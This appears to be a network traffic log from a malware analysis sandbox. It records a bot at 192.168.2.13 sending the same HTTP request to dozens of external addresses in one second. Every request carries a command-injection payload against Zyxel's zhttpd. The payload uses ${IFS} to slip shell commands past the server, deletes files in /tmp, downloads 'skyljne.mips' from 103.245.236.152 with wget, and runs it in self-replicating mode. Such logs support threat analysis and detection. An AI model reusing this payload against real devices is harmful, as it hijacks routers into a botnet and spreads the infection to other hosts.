                                        Jan 14, 2024 16:18:34.205555916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1471192.168.2.1336296114.118.148.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205586910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1472192.168.2.13440688.72.185.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205657959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1473192.168.2.1355200203.245.20.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205703020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1474192.168.2.1347302220.246.119.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205768108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1475192.168.2.1352090136.17.125.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205791950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1476192.168.2.1357112210.39.148.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205867052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1477192.168.2.1335028115.129.226.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205928087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1478192.168.2.1341468209.165.91.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205950022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1479192.168.2.1348234151.168.208.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206021070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1480192.168.2.1336990183.109.76.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206079960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1481192.168.2.134744439.183.95.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206136942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1482192.168.2.1348320140.188.122.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206182957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1483192.168.2.135653890.240.48.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206222057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1484192.168.2.134895840.64.143.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206260920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1485192.168.2.133367694.14.233.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206296921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1486192.168.2.1344556198.41.140.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206371069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1487192.168.2.1337496157.196.201.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206413984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1488192.168.2.135718853.87.206.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206489086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1489192.168.2.135926672.213.118.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206521988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1490192.168.2.134471081.110.90.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206589937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1491192.168.2.136017460.195.249.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206651926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1492192.168.2.1348264201.9.39.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206713915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1493192.168.2.135779670.251.239.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206789970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1494192.168.2.134832495.10.140.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206834078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1495192.168.2.1337946106.200.172.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206899881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1496192.168.2.134989499.155.187.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206954002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1497192.168.2.135622260.4.250.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.206988096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1498192.168.2.1342946141.55.124.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207046032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1499192.168.2.1357592128.167.33.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207101107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1500192.168.2.1341916202.39.132.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207156897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1501192.168.2.1355076219.234.180.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207211018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1502192.168.2.1339496143.29.15.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207276106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1503192.168.2.135570444.191.137.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207319021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1504192.168.2.135322679.1.26.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207379103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1505192.168.2.13363642.245.207.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207412004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1506192.168.2.1342418122.41.116.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207446098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1507192.168.2.1334324180.30.34.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207501888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1508192.168.2.134734678.244.51.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207562923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1509192.168.2.1342678113.99.41.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207612991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1510192.168.2.1358642136.41.115.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207684040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1511192.168.2.133468285.218.206.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207745075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1512192.168.2.1334880197.255.21.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207798004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1513192.168.2.133513031.28.70.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207849979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1514192.168.2.133520254.97.193.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207906008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1515192.168.2.1338176208.10.21.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.207966089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1516192.168.2.1351360217.166.173.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208018064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1517192.168.2.133660678.135.73.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208079100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1518192.168.2.1354356139.130.70.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208105087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1519192.168.2.1350482213.243.113.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208182096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1520192.168.2.1360164118.200.109.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208231926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1521192.168.2.1337632130.200.240.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208302021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1522192.168.2.1334102153.170.223.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208363056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1523192.168.2.133669674.17.213.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208437920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1524192.168.2.1348198211.29.68.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208471060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1525192.168.2.1347554218.228.211.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208519936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1526192.168.2.1333014126.24.172.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208595991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1527192.168.2.1350052156.206.171.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208645105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1528192.168.2.1344652203.172.13.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208694935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1529192.168.2.1353182107.190.109.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208771944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1530192.168.2.133817294.118.13.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208817959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1531192.168.2.135922619.15.162.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208874941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1532192.168.2.1340182174.6.92.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.208940983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1533192.168.2.135228483.93.104.119443
                                        TimestampBytes transferredDirectionData
